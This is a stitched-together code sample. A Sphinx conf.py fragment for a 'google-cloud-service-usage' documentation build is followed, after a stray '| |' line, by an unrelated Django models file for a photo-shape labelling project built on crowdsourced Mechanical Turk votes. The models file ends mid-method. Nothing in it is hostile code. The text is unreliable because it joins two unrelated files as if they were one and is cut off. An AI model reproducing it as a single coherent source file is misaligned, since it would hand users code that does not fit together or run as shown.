# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(
root_doc,
"google-cloud-service-usage.tex",
"google-cloud-service-usage Documentation",
author,
"manual",
)
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(
root_doc,
"google-cloud-service-usage",
"google-cloud-service-usage Documentation",
[author],
1,
)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
root_doc,
"google-cloud-service-usage",
"google-cloud-service-usage Documentation",
author,
"google-cloud-service-usage",
"google-cloud-service-usage Library",
"APIs",
)
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
"python": ("https://python.readthedocs.org/en/latest/", None),
"google-auth": ("https://googleapis.dev/python/google-auth/latest/", None),
"google.api_core": ("https://googleapis.dev/python/google-api-core/latest/", None,),
"grpc": ("https://grpc.github.io/grpc/python/", None),
"proto-plus": ("https://proto-plus-python.readthedocs.io/en/latest/", None),
"protobuf": ("https://googleapis.dev/python/protobuf/latest/", None),
}
# Napoleon settings
napoleon_google_docstring = True
napoleon_numpy_docstring = True
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
| |
import json
from collections import Counter
from django.db import models
from django.core.urlresolvers import reverse
from django.db.models.loading import get_model
from imagekit.models import ImageSpecField
from imagekit.processors import ResizeToFit, ResizeCanvas
from common.models import EmptyModelBase, ResultBase
from photos.models import Photo
from common.utils import compute_entropy, get_content_tuple, \
get_opensurfaces_storage
from common.geom import bbox_svg_transform
# Storage backend shared by all shape image fields and thumbnails below.
STORAGE = get_opensurfaces_storage()
##
## Categories
##
class ShapeName(EmptyModelBase):
    """ Object category, e.g. "Kettle", "Cat", ... """

    #: name of the category, e.g. "Kettle", "Cat", ...
    name = models.CharField(max_length=127, unique=True)

    #: (currently not used) an optional parent category, if categories
    #: are arranged in a tree
    parent = models.ForeignKey('self', blank=True, null=True)

    #: text description of this object category
    description = models.TextField(blank=True)

    #: a shape that can be shown as an example
    representative_shape = models.ForeignKey(
        'MaterialShape', blank=True, null=True)

    #: if True, this is actually a special failure case category
    fail = models.BooleanField(default=False)

    #: values of ``name`` that are considered "fail"
    FAIL_NAMES = ("Not on list", "More than one object", "I can't tell")

    def material_shape_count(self):
        """ Number of correct, sufficiently large MaterialShapes labeled
        with this object name """
        return get_model('shapes', 'MaterialShape').objects.filter(
            pixel_area__gt=Shape.MIN_PIXEL_AREA, correct=True,
            name=self,
        ).count()

    def __unicode__(self):
        return self.name

    class Meta:
        ordering = ['-fail', 'name']

    def save(self, *args, **kwargs):
        # names on the FAIL_NAMES list are automatically flagged as
        # failure categories
        if self.name in ShapeName.FAIL_NAMES:
            self.fail = True
        super(ShapeName, self).save(*args, **kwargs)
class ShapeSubstance(EmptyModelBase):
    """ Material category, e.g. "wood", "brick", ... """

    #: name of the material category
    name = models.CharField(max_length=127, unique=True)

    #: an optional parent category, if categories are arranged in a tree
    parent = models.ForeignKey('self', blank=True, null=True)

    #: text description of this material category
    description = models.TextField(blank=True)

    #: a shape that can be shown as an example
    representative_shape = models.ForeignKey(
        'MaterialShape', blank=True, null=True)

    # if True, this is actually a special failure case category
    fail = models.BooleanField(default=False)

    # if True, this is shown as an option for new labels
    active = models.BooleanField(default=False)

    # each substance group corresponds to a different (possibly overlapping)
    # set of potential object names
    group = models.ForeignKey(
        'ShapeSubstanceGroup', blank=True, null=True,
        related_name='substances')

    #: values of ``name`` that are considered "fail"
    FAIL_NAMES = ("Not on list", "More than one material", "I can't tell")

    def material_shape_count(self):
        """ Number of correct, sufficiently large MaterialShapes labeled
        with this substance """
        return get_model('shapes', 'MaterialShape').objects.filter(
            pixel_area__gt=Shape.MIN_PIXEL_AREA, correct=True,
            substance=self,
        ).count()

    def save(self, *args, **kwargs):
        # names on the FAIL_NAMES list are automatically flagged as
        # failure categories
        if self.name in ShapeSubstance.FAIL_NAMES:
            self.fail = True
        super(ShapeSubstance, self).save(*args, **kwargs)

    def __unicode__(self):
        return self.name

    class Meta:
        ordering = ['-fail', 'name']
class ShapeSubstanceGroup(EmptyModelBase):
    """ Grouping of substances; each substance group is assigned a list of
    names that can be used """

    # NOTE(review): presumably whether this group is offered for new
    # labels, mirroring ShapeSubstance.active -- confirm against callers
    active = models.BooleanField(default=True)

    #: object names that may be used with substances in this group
    names = models.ManyToManyField(ShapeName, related_name='substance_groups')
##
## Shapes
##
class Shape(ResultBase):
    """ Abstract parent describing a complex polygon. Shapes are represented
    as a bag of vertices, triangles, and line segments. Users submit
    instances of SubmittedShapes, which are then intersected and triangulated
    to form subclasses of Shape. """

    #: min size of a shape
    MIN_PIXEL_AREA = 4096

    #: min size of a shape for rectification
    MIN_PLANAR_AREA = 16384

    #: Vertices format: x1,y1,x2,y2,x3,y3,... (coords are fractions of width/height)
    #: (this format allows easy embedding into javascript)
    vertices = models.TextField()

    #: num_vertices should be equal to len(points.split(','))//2
    num_vertices = models.IntegerField(db_index=True)

    #: Triangles format: p1,p2,p3,p2,p3,p4..., where p_i is an index into
    #: vertices, and p1-p2-p3 is a triangle. Each triangle is three indices
    #: into points; all triangles are listed together. This format allows easy
    #: embedding into javascript.
    triangles = models.TextField()

    #: num_triangles should be equal to len(triangles.split(','))//3
    num_triangles = models.IntegerField()

    #: Segments format: "p1,p2,p2,p3,...", where p_i is an index into vertices,
    #: and p1-p2, p2-p3, ... are the line segments. The segments are unordered.
    #: Each line segment is two indices into points; all segments are listed
    #: together. This format allows easy embedding into javascript.
    segments = models.TextField()

    #: num_segments should be equal to len(segments.split(','))//2
    num_segments = models.IntegerField()

    ## Line segments re-grouped as poly-lines "[[p1,p2,p3,p4],[p1,p2,p3],...]",
    ## json encoded. Each p_i is an index into vertices. This is the exact same
    ## data as the segments field, but with line segments properly grouped.
    #polylines = models.TextField()

    ## Number of unique polylines; should equal len(json.loads(polylines))
    #num_polylines = models.IntegerField()

    #: Area in normalized units. To get the pixel area, multiply this by the
    #: total photo area.
    area = models.FloatField()

    #: Area in pixels
    pixel_area = models.IntegerField(null=True, db_index=True)

    #: flag to separate out this shape
    synthetic = models.BooleanField(default=False)
    synthetic_slug = models.CharField(max_length=32, blank=True)

    #: if true, enough users voted this to be the correct type of segmentation
    correct = models.NullBooleanField()

    #: further from 0: more confident in assignment of correct
    correct_score = models.FloatField(
        blank=True, null=True, db_index=True)

    #: if true, enough users voted this to be flat
    planar = models.NullBooleanField()

    #: CUBAM score for the planar field. further from 0: more confident in
    #: assignment of planar.
    planar_score = models.FloatField(blank=True, null=True, db_index=True)

    #: method by which the planar field was set
    PLANAR_METHODS = (('A', 'admin'), ('C', 'CUBAM'), ('M', 'majority vote'))
    planar_method_to_str = dict((k, v) for (k, v) in PLANAR_METHODS)
    planar_method = models.CharField(
        max_length=1, choices=PLANAR_METHODS, blank=True, null=True)

    #: Photo masked by the shape and cropped to the bounding box. The masked
    #: (excluded) region has pixels that are white with no opacity (ARGB value
    #: (0, 255, 255, 255)).
    image_crop = models.ImageField(
        upload_to='shapes', blank=True, max_length=255, storage=STORAGE)

    #: square thumbnail with whitebackground
    image_square_300 = ImageSpecField(
        [ResizeToFit(300, 300), ResizeCanvas(300, 300, color=(255, 255, 255))],
        source='image_crop', format='JPEG', options={'quality': 90}, cachefile_storage=STORAGE)

    #: bbox: photo cropped out to the bounding box of this shape
    image_bbox = models.ImageField(
        upload_to='bbox', blank=True, max_length=255, storage=STORAGE)

    #: bbox resized to fit in 512x512
    image_bbox_512 = ImageSpecField(
        [ResizeToFit(512, 512)],
        source='image_bbox', format='JPEG', options={'quality': 90}, cachefile_storage=STORAGE)

    #: bbox resized to fit in 1024x1024 (used by opengl widget in rectify task)
    image_bbox_1024 = ImageSpecField(
        [ResizeToFit(1024, 1024)],
        source='image_bbox', format='JPEG', options={'quality': 90}, cachefile_storage=STORAGE)

    #: position to show a label (normalized coordinates)
    label_pos_x = models.FloatField(blank=True, null=True)
    label_pos_y = models.FloatField(blank=True, null=True)

    ## json-encoded array [min x, min y, max x, max y] indicating the position
    ## of the bounding box. as usual, positions are specified as fractions of
    ## width and height.
    #bbox = models.TextField(blank=True)

    ## bbox width/height aspect ratio
    #bbox_aspect_ratio = models.FloatField(null=True, blank=True)

    #: padded bounding box image. this is the bounding box, expanded by 25% on
    #: each side (as a fraction of the bbox width,height), and then the smaller
    #: dimension is expanded to as quare.
    image_pbox = models.ImageField(
        upload_to='pbox', blank=True, max_length=255, storage=STORAGE)
    image_pbox_300 = ImageSpecField(
        [ResizeToFit(300, 300)],
        source='image_pbox', format='JPEG', options={'quality': 90},
        cachefile_storage=STORAGE)
    image_pbox_512 = ImageSpecField(
        [ResizeToFit(512, 512)],
        source='image_pbox', format='JPEG', options={'quality': 90},
        cachefile_storage=STORAGE)
    image_pbox_1024 = ImageSpecField(
        [ResizeToFit(1024, 1024)],
        source='image_pbox', format='JPEG', options={'quality': 90},
        cachefile_storage=STORAGE)

    # pbox width/height aspect ratio (as a ratio of pixel lengths)
    pbox_aspect_ratio = models.FloatField(null=True, blank=True)

    # json-encoded array [min x, min y, max x, max y] indicating the position
    # of the padded box. as usual, positions are specified as fractions of
    # width and height.
    pbox = models.TextField(blank=True)

    ## The THREE.js vertices are re-normalized so that the aspect ratio is
    ## correct. The x-coordinate is now in units of height, not width.
    ## THREE.js json file
    #three_js = models.FileField(
    #upload_to='three', blank=True, max_length=255)

    ## THREE.js buffer file
    #three_bin = models.FileField(
    #upload_to='three', blank=True, max_length=255)

    # approximate area of the rectified texture (in pixels)
    rectified_area = models.FloatField(null=True, blank=True)

    # dominant color of this shape
    dominant_r = models.FloatField(null=True, blank=True)
    dominant_g = models.FloatField(null=True, blank=True)
    dominant_b = models.FloatField(null=True, blank=True)

    # top 4 dominant colors written as #rrggbb (for easy HTML viewing)
    # (in decreasing order of frequency)
    dominant_rgb0 = models.CharField(max_length=7, blank=True, default='')
    dominant_rgb1 = models.CharField(max_length=7, blank=True, default='')
    dominant_rgb2 = models.CharField(max_length=7, blank=True, default='')
    dominant_rgb3 = models.CharField(max_length=7, blank=True, default='')

    # difference between top two colors
    dominant_delta = models.FloatField(null=True, blank=True)

    def has_fov(self):
        """ True if the photo has a known (positive) field of view """
        return self.photo.fov > 0

    def publishable(self):
        """ Delegates to the photo's publishable flag """
        return self.photo.publishable()

    def image_pbox_height(self, width):
        """ Returns the height of image_pbox_<width> """
        return min(width, width / self.pbox_aspect_ratio)

    def label_pos_x_scaled(self):
        """ Returns the label position normalized by height instead of width
        """
        return self.label_pos_x * self.photo.aspect_ratio

    def label_pos_2_y_512(self):
        """ Label y position shifted down by 1.25 font lines (512px size) """
        return self.label_pos_y + 1.25 * self.photo.font_size_512()

    # helpers for templates
    def image_pbox_height_1024(self):
        return self.image_pbox_height(1024)

    def image_pbox_height_512(self):
        return self.image_pbox_height(512)

    def save(self, *args, **kwargs):
        """ Fills in any derived fields that are still empty, then saves.
        Thumbnails and dominant colors are computed synchronously so the
        shape only becomes visible once they exist. """
        # compute counts:
        if not self.num_vertices:
            self.num_vertices = len(self.vertices.split(',')) // 2
        if not self.num_triangles:
            self.num_triangles = len(self.triangles.split(',')) // 3
        if not self.num_segments:
            self.num_segments = len(self.segments.split(',')) // 2
        if not self.area:
            from shapes.utils import complex_polygon_area
            self.area = complex_polygon_area(self.vertices, self.triangles)
        if not self.pixel_area:
            self.pixel_area = (self.area * self.photo.image_orig.width *
                               self.photo.image_orig.height)
        if not self.synthetic:
            self.synthetic = self.photo.synthetic
        if not self.label_pos_x or not self.label_pos_y:
            from shapes.utils import update_shape_label_pos
            update_shape_label_pos(self, save=False)
        thumbs_dirty = (not self.id)
        # compute cropped image synchronously, before saving
        # (this way the shape only shows up after all thumbs are available)
        if not self.image_crop or not self.image_bbox:
            from shapes.utils import update_shape_image_crop
            update_shape_image_crop(self, save=False)
            thumbs_dirty = True
        if not self.image_pbox:
            from shapes.utils import update_shape_image_pbox
            update_shape_image_pbox(self, save=False)
            thumbs_dirty = True
        #if not self.three_js or not self.three_bin:
        #from shapes.utils import update_shape_three
        #update_shape_three(self, save=False)
        #if not self.dominant_rgb0:
        if thumbs_dirty:
            from shapes.utils import update_shape_dominant_rgb
            update_shape_dominant_rgb(self, save=False)
        if (not self.dominant_delta and
                self.dominant_rgb0 and
                self.dominant_rgb1):
            from shapes.utils import update_shape_dominant_delta
            update_shape_dominant_delta(self, save=False)
        super(Shape, self).save(*args, **kwargs)

    def render_full_complex_polygon_mask(
            self, width=None, height=None, inverted=False):
        """
        Returns a black-and-white PIL image (mode ``1``) the same size as the
        original photo (unless ``width`` and ``height`` are specified).  Pixels
        inside the polygon are ``1`` and pixels outside are ``0`` (unless
        ``inverted=True``).

        :param width: width in pixels, or if ``None``, use
            ``self.photo.orig_width``.

        :param height: height in pixels, or if ``None``, use
            ``self.photo.orig_height``.

        :param inverted: if ``True``, swap ``0`` and ``1`` in the output.
        """
        from shapes.utils import render_full_complex_polygon_mask
        return render_full_complex_polygon_mask(
            vertices=self.vertices,
            triangles=self.triangles,
            width=width if width else self.photo.orig_width,
            height=height if height else self.photo.orig_height,
            inverted=inverted)

    # temporary hack
    def is_kitchen(self):
        return (self.photo.scene_category.name == u'kitchen')

    # temporary hack
    def is_living_room(self):
        return (self.photo.scene_category.name == u'living room')

    # deprecated -- delete at some point
    def area_pixels(self):
        return (self.area *
                self.photo.image_orig.width *
                self.photo.image_orig.height)

    def __unicode__(self):
        return 'Shape (%s v)' % self.num_vertices

    def segments_svg_path(self):
        """ Returns all line segments as SVG path data """
        verts = self.vertices.split(',')  # leave as string
        segs = [int(v) for v in self.segments.split(',')]
        data = []
        for i in xrange(0, len(segs), 2):
            v0 = 2 * segs[i]
            v1 = 2 * segs[i + 1]
            data.append(u"M%s,%sL%s,%s" % (
                verts[v0], verts[v0 + 1],
                verts[v1], verts[v1 + 1],
            ))
        return u"".join(data)

    def triangles_svg_path(self):
        """ Returns all triangles as SVG path data """
        verts = self.vertices.split(',')  # leave as string
        tris = [int(v) for v in self.triangles.split(',')]
        data = []
        for i in xrange(0, len(tris), 3):
            v0 = 2 * tris[i]
            v1 = 2 * tris[i + 1]
            v2 = 2 * tris[i + 2]
            data.append(u"M%s,%sL%s,%sL%s,%sz" % (
                verts[v0], verts[v0 + 1],
                verts[v1], verts[v1 + 1],
                verts[v2], verts[v2 + 1],
            ))
        return u"".join(data)

    def pbox_view_box(self):
        """ Returns the padded box as the tuple
        ``(min_x, min_y, width, height)`` """
        pbox = json.loads(self.pbox)
        # pbox is [min_x, min_y, max_x, max_y].
        # bugfix: height is max_y - min_y; the previous code computed
        # pbox[3] - pbox[0] (max_y - min_x), mixing the two axes.
        return (pbox[0], pbox[1], pbox[2] - pbox[0], pbox[3] - pbox[1])

    def pbox_svg_transform(self):
        return "scale(%s,1) %s" % (
            self.pbox_aspect_ratio,
            bbox_svg_transform(json.loads(self.pbox)),
        )

    #def shape_svg_url_large(self):
    #from shapes.utils import material_shape_svg_url_large
    #return material_shape_svg_url_large(self)

    #def shape_svg_url_small(self):
    #from shapes.utils import material_shape_svg_url_small
    #return material_shape_svg_url_small(self)

    def get_entry_dict(self):
        """ Return a dictionary of this model containing just the fields needed
        for javascript rendering. """
        # generating thumbnail URLs is slow, so only generate the ones
        # that will definitely be used.
        ret = {
            'id': self.id,
            'vertices': self.vertices,
            'triangles': self.triangles,
            'segments': self.segments,
            'photo': self.photo.get_entry_dict(),
        }
        if self.dominant_rgb0:
            ret['dominant_rgb0'] = self.dominant_rgb0
        #if self.image_pbox:
        #ret['pbox'] = self.pbox
        #ret['image_pbox'] = {
        #'300': self.image_pbox_300.url,
        #'512': self.image_pbox_512.url,
        #'1024': self.image_pbox_1024.url,
        #'orig': self.image_pbox.url,
        #}
        if self.image_bbox:
            ret['image_bbox'] = {
                #'512': self.image_bbox_512.url,
                '1024': self.image_bbox_1024.url,
                #'orig': self.image_bbox.url,
            }
        return ret

    def mark_invalid(self, *args, **kwargs):
        # an invalid shape is by definition not a correct segmentation
        self.correct = False
        super(Shape, self).mark_invalid(*args, **kwargs)

    class Meta:
        abstract = True
        ordering = ['-num_vertices', '-time_ms']
class MaterialShape(Shape):
    """ Complex polygon containing a single material. This is created after a
    SubmittedShape has been triangulated. """

    photo = models.ForeignKey(Photo, related_name='material_shapes')

    #: the submitted shapes that contain this shape
    submitted_shapes = models.ManyToManyField(
        'SubmittedShape', related_name='material_shapes')

    #: majority vote substance
    substance = models.ForeignKey(ShapeSubstance, null=True, blank=True)

    #: disagreement about substance
    substance_entropy = models.FloatField(null=True, blank=True)

    #: CUBAM score for substance
    substance_score = models.FloatField(null=True, blank=True)

    #: majority vote name
    name = models.ForeignKey(ShapeName, null=True, blank=True)

    #: disagreement about name
    name_entropy = models.FloatField(null=True, blank=True)

    #: CUBAM score for name
    name_score = models.FloatField(null=True, blank=True)

    #: Best rectified normal for this shape
    rectified_normal = models.ForeignKey(
        'normals.ShapeRectifiedNormalLabel', null=True, blank=True)

    #: Best reflectance for this shape
    bsdf_wd = models.ForeignKey(
        'bsdfs.ShapeBsdfLabel_wd', null=True, blank=True)

    #: Default filters for views
    DEFAULT_FILTERS = {
        'pixel_area__gt': Shape.MIN_PIXEL_AREA,
        'invalid': False,
        'correct': True,
        'synthetic': False,
        'photo__inappropriate': False,
        'photo__stylized': False,
        'photo__rotated': False,
        'photo__nonperspective': False,
        'photo__scene_category_correct': True,
        'photo__scene_category_correct_score__isnull': False,
    }

    def has_substance(self):
        """ True if a majority-vote substance has been assigned """
        return self.substance is not None

    def save(self, *args, **kwargs):
        # recompute vote-derived labels if either entropy is missing
        if not self.substance_entropy or not self.name_entropy:
            self.update_entropy(save=False)
        super(MaterialShape, self).save(*args, **kwargs)

    def update_entropy(self, save=True):
        """ Update best label for each type of data """
        #min_consensus = self.mturk_assignment.hit.hit_type \
        #.experiment_settings.min_output_consensus
        min_consensus = 3

        # update substance label and entropy
        self.substance = None
        substances = self.substances.filter(invalid=False) \
            .values_list('substance_id', flat=True)
        if substances:
            self.substance_entropy = compute_entropy(substances)
            hist = Counter(substances).most_common(2)
            substance_id, count = hist[0]
            # must be at least the consensus, and larger than the 2nd choice
            if count >= min_consensus and (len(hist) == 1 or hist[1][1] < count):
                self.substance_id = substance_id
                self.quality_method = 'M'

        # update name label and entropy
        self.name = None
        names = self.names.filter(invalid=False) \
            .values_list('name_id', flat=True)
        if names.exists():
            self.name_entropy = compute_entropy(names)
            hist = Counter(names).most_common(2)
            name_id, count = hist[0]
            # must be at least the consensus, and larger than the 2nd choice
            if count >= min_consensus and (len(hist) == 1 or hist[1][1] < count):
                self.name_id = name_id
                self.quality_method = 'M'

        # update rectified normal: pick the best correct label, if any
        self.rectified_normal = None
        if self.planar:
            for n in self.rectified_normals.all():
                if n.better_than(self.rectified_normal):
                    self.rectified_normal = n
            if self.rectified_normal and not self.rectified_normal.correct:
                self.rectified_normal = None

        # update bsdf: pick the best label that passed both vote types
        self.bsdf_wd = None
        for b in self.bsdfs_wd.all():
            if b.gloss_correct and b.color_correct and b.better_than(self.bsdf_wd):
                self.bsdf_wd = b

        if save:
            self.save()

    def num_material_votes(self):
        """ mturk votes that the shape is a good material segmentation """
        return self.qualities.filter(correct=True).count()

    def num_bad_votes(self):
        """ mturk votes that the shape is a bad segmentation """
        return self.qualities.filter(correct=False).count()

    def num_votes(self):
        """ mturk vote count """
        return self.qualities.count()

    def votes_dict(self):
        """ mturk votes as a python dictionary """
        votes = {'M': 0, 'B': 0}
        for q in self.qualities.all():
            if q.correct:
                votes['M'] += 1
            else:
                votes['B'] += 1
        return votes

    def num_planar_votes(self):
        return self.planarities.filter(planar=True).count()

    def num_nonplanar_votes(self):
        return self.planarities.filter(planar=False).count()

    def num_planarity_votes(self):
        return self.planarities.count()

    def __unicode__(self):
        return 'MaterialShape (%s v, id=%s)' % (self.num_vertices, self.id)

    def get_absolute_url(self):
        return reverse('shapes.views.material_shape_detail', args=[str(self.id)])

    def get_thumb_template(self):
        return 'material_shape_thumb.html'
class SubmittedShape(ResultBase):
    """ Simple polygon submitted by a user (described by a single closed
    poly-line, no holes) """

    photo = models.ForeignKey(Photo, related_name='submitted_shapes')

    # Vertices format: x1,y1,x2,y2,x3,y3,... (coords are fractions of width/height)
    # (this format allows easy embedding into javascript)
    vertices = models.TextField(null=True)

    # num_vertices should be equal to len(points.split(','))//2
    num_vertices = models.IntegerField(null=True)

    # shape type: material segmentation or object segmentation
    SHAPE_TYPES = (('M', 'material'), ('O', 'object'))
    shape_type_to_str = dict((k, v) for (k, v) in SHAPE_TYPES)
    str_to_shape_type = dict((v, k) for (k, v) in SHAPE_TYPES)
    shape_type = models.CharField(max_length=1, choices=SHAPE_TYPES)

    def __unicode__(self):
        return '%s vertices' % self.num_vertices

    def get_thumb_template(self):
        return 'submitted_shape_thumb.html'

    def publishable(self):
        return self.photo.publishable()

    #@classmethod
    #def mturk_badness(cls, mturk_assignment):
    #""" Return fraction of bad responses for this assignment """
    #shapes = cls.objects.filter(mturk_assignment=mturk_assignment)
    #if not shapes:
    #return None
    ## reject all-triangle or empty submissions
    #if all(s.num_vertices < 4 for s in shapes):
    #return 1.0
    #tshapes = []
    #for s in shapes:
    #if s.shape_type == 'M':
    #tshapes += s.material_shapes.all()
    #elif s.shape_type == 'O':
    #tshapes += s.object_shapes.all()
    #else:
    #raise ValueError('Error in model')
    ## we can't really say what happened, so we shouldn't reject it
    #if not tshapes:
    #return 0.0
    ## count percentage of bad labels
    #bad = 0
    #for ts in tshapes:
    #if ts.time_ms < 3000:
    #bad += 1
    #elif ts.pixel_area < Shape.MIN_PIXEL_AREA:
    #bad += 0.5
    #elif ts.correct_score is None:
    #return None
    #elif ts.correct_score < -0.5 and ts.time_ms < 30000:
    #bad += 1.0
    #if bad > 0:
    #return float(bad) / float(len(tshapes))
    ## reward good shapes; the negative badness score
    ## becomes a bonus later on
    #return sum(-1.0 for ts in tshapes if
    #ts.correct_score > 0.5 and
    #ts.num_vertices > 30 and
    #ts.time_ms > 30000 and
    #ts.area > 0.03)

    @staticmethod
    def mturk_submit(user, hit_contents, results, time_ms, time_active_ms,
                     experiment, version, mturk_assignment=None, **kwargs):
        """ Add new instances from a mturk HIT after the user clicks [submit] """
        if unicode(version) != u'1.0':
            raise ValueError("Unknown version: %s" % version)
        photo = hit_contents[0]
        # results/time_ms/time_active_ms are keyed by photo id (as a string)
        poly_list = results[str(photo.id)]
        time_ms_list = time_ms[str(photo.id)]
        time_active_ms_list = time_active_ms[str(photo.id)]
        if len(poly_list) != len(time_ms_list):
            raise ValueError("Result length mismatch (%s polygons, %s times)" % (
                len(poly_list), len(time_ms_list)))
        shape_model = MaterialShape
        slug = experiment.slug
        if slug == "segment_material":
            shape_type = 'M'
        elif slug == "segment_object":
            shape_type = 'O'
        else:
            raise ValueError("Unknown slug: %s" % slug)
        # store results in SubmittedShape objects
        new_objects_list = []
        for idx in xrange(len(poly_list)):
            poly_vertices = poly_list[idx]
            poly_time_ms = time_ms_list[idx]
            poly_time_active_ms = time_active_ms_list[idx]
            num_vertices = len(poly_vertices)
            if num_vertices % 2 != 0:
                raise ValueError("Odd number of vertices (%d)" % num_vertices)
            num_vertices //= 2
            new_obj, created = photo.submitted_shapes.get_or_create(
                user=user,
                mturk_assignment=mturk_assignment,
                time_ms=poly_time_ms,
                time_active_ms=poly_time_active_ms,
                # (repr gives more float digits)
                vertices=','.join([repr(f) for f in poly_vertices]),
                num_vertices=num_vertices,
                shape_type=shape_type
            )
            if created:
                new_objects_list.append(new_obj)
        # triangulate polygons (creates instances of shape_model)
        if new_objects_list:
            from shapes.tasks import triangulate_submitted_shapes_task
            triangulate_submitted_shapes_task.delay(
                photo, user, mturk_assignment, shape_model, new_objects_list)
        if new_objects_list:
            return {get_content_tuple(photo): new_objects_list}
        else:
            return {}
##
## Labels
##
class MaterialShapeLabelBase(ResultBase):
    """ Abstract parent for labels attached to material shapes """

    #: vote from admin
    #: -2: reject
    #: -1: can't really tell what's going on
    #: 0: un-voted
    #: 1: good, but missed something (not rotated)
    #: 2: correct
    #: 3: correct exemplar
    admin_score = models.IntegerField(default=0)

    # if false, then the user started working on a label but did not submit
    #complete = models.BooleanField(default=False)

    def publishable(self):
        # labels are publishable iff their shape (and hence photo) is
        return self.shape.publishable()

    def get_thumb_template(self):
        return 'material_shape_label_thumb.html'

    class Meta:
        abstract = True
        ordering = ['shape', '-time_ms']
class ShapeSubstanceLabel(MaterialShapeLabelBase):
    """ Material common name, e.g. "Wood", "Brick" """

    #: shape being labeled
    shape = models.ForeignKey(MaterialShape, related_name="substances")

    #: substance chosen for the shape
    substance = models.ForeignKey(ShapeSubstance, blank=True, null=True)

    def __unicode__(self):
        if self.substance:
            base = self.substance.name
        else:
            return "(Invalid label)"
        # sandbox labels are marked so they are easy to spot in listings
        if self.mturk_assignment.hit.sandbox:
            return base + " (SB)"
        else:
            return base

    class Meta:
        ordering = ['-substance', '-time_ms']

    def get_thumb_overlay(self):
        return self.__unicode__()

    #@classmethod
    #def mturk_badness(cls, mturk_assignment):
    #""" Return fraction of bad responses for this assignment """
    #labels = cls.objects.filter(mturk_assignment=mturk_assignment)
    #if not labels:
    #return None
    #total = sum(1 for l in labels if l.shape.substance)
    #if total == 0:
    #return None
    #bad = sum(1 for l in labels if
    #l.time_ms < 400 or
    #(l.shape.substance and l.substance != l.shape.substance))
    #return float(bad) / max(float(total), 3)

    @staticmethod
    def mturk_submit(user, hit_contents, results, time_ms, time_active_ms, version,
                     mturk_assignment=None, **kwargs):
        """ Add new instances from a mturk HIT after the user clicks [submit] """
        if unicode(version) != u'1.0':
            raise ValueError("Unknown version: '%s'" % version)
        if not hit_contents:
            return {}
        if not user:
            raise ValueError("Null user")
        new_objects = {}
        for shape in hit_contents:
            # results/time dicts are keyed by shape id (as a unicode string)
            name_string = results[unicode(shape.id)]
            shape_time_ms = time_ms[unicode(shape.id)]
            shape_time_active_ms = time_active_ms[unicode(shape.id)]
            # normalize case
            name_string = name_string.lower()
            name_string = name_string[0].upper() + name_string[1:]
            substance, created = ShapeSubstance.objects.get_or_create(
                name=name_string,
            )
            new_obj, created = shape.substances.get_or_create(
                user=user,
                mturk_assignment=mturk_assignment,
                time_ms=shape_time_ms,
                time_active_ms=shape_time_active_ms,
                substance=substance)
            # a new vote may change the majority label
            if created and substance:
                shape.update_entropy(save=True)
            new_objects[get_content_tuple(shape)] = [new_obj]
        return new_objects
class MaterialShapeNameLabel(MaterialShapeLabelBase):
    """ Object common name, e.g. "chair", "door" """

    #: Shape being labeled
    shape = models.ForeignKey(MaterialShape, related_name="names")

    #: Object name chosen for the shape
    name = models.ForeignKey(ShapeName, blank=True, null=True)

    def __unicode__(self):
        if self.name:
            base = self.name.name
        else:
            return "(Invalid label)"
        # sandbox labels are marked so they are easy to spot in listings
        if self.mturk_assignment.hit.sandbox:
            return base + " (SB)"
        else:
            return base

    class Meta:
        ordering = ['-name', '-time_ms']

    def get_thumb_overlay(self):
        return self.__unicode__()

    #@classmethod
    #def mturk_badness(cls, mturk_assignment):
    #""" Return fraction of bad responses for this assignment """
    #labels = cls.objects.filter(mturk_assignment=mturk_assignment)
    #if not labels:
    #return None
    #total = sum(1 for l in labels if l.shape.name)
    #if total == 0:
    #return None
    #bad = sum(1 for l in labels if
    #l.time_ms < 400 or
    #(l.shape.name and l.name != l.shape.name))
    #return float(bad) / max(3, float(total))

    @staticmethod
    def mturk_submit(user, hit_contents, results, time_ms, time_active_ms, version,
                     mturk_assignment=None, **kwargs):
        """ Add new instances from a mturk HIT after the user clicks [submit] """
        if unicode(version) != u'1.0':
            raise ValueError("Unknown version: '%s'" % version)
        if not hit_contents:
            return {}
        if not user:
            raise ValueError("Null user")
        new_objects = {}
        for shape in hit_contents:
            # results/time dicts are keyed by shape id (as a unicode string)
            name_string = results[unicode(shape.id)]
            shape_time_ms = time_ms[unicode(shape.id)]
            shape_time_active_ms = time_active_ms[unicode(shape.id)]
            # normalize case
            name_string = name_string.lower()
            name_string = name_string[0].upper() + name_string[1:]
            name = ShapeName.objects.get_or_create(
                name=name_string,
            )[0]
            new_obj, created = shape.names.get_or_create(
                user=user,
                mturk_assignment=mturk_assignment,
                time_ms=shape_time_ms,
                time_active_ms=shape_time_active_ms,
                name=name)
            # a new vote may change the majority label
            if created and name:
                shape.update_entropy(save=True)
